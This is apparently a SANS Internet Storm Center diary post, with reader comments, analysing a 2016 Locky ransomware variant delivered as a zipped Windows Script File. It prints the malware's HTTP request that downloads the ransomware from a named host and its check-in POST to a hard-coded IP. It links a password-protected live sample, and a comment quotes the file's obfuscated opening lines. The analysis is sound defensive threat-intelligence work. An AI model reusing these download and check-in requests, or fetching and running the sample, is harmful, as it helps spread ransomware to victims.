My next class:

Today's Locky Variant Arrives as a Windows Script File

Published: 2016-08-30. Last Updated: 2016-08-30 13:42:35 UTC
by Johannes Ullrich (Version: 1)
3 comment(s)

Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. "Windows Script" is essentially JavaScript. The only difference is the tag at the beginning of the file.

Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.

GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0;
 .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive

Just like earlier versions, it then "registers" the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:

POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; 
.NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive  

[post data omitted]

Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: "blind chicken" ).

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
3 comment(s)
My next class:

Comments

Also using HTA files today & on other odd occasions recently https://myonlinesecurity.co.uk/sent-with-genius-scan-for-ios-pretending-to-come-from-your-own-email-address-leads-to-locky-ransomware/
Greetings:

I'm pretty sure I just got some malware in the form of a ZIP file containing a .wsf file (XML text). It's a bit long to paste. First few lines:

<?xml?>
<package>
<job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[
String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() {

If this is of any interest, let me know the best way to get it to you. I'm on an Air Force base, so I may not be able to use methods that work for everyone else.

Thanks.

--
Karl Vogel
vogelke+isc@pobox.com
you can upload file via our contact form https://isc.sans.edu/contact.html

Diary Archives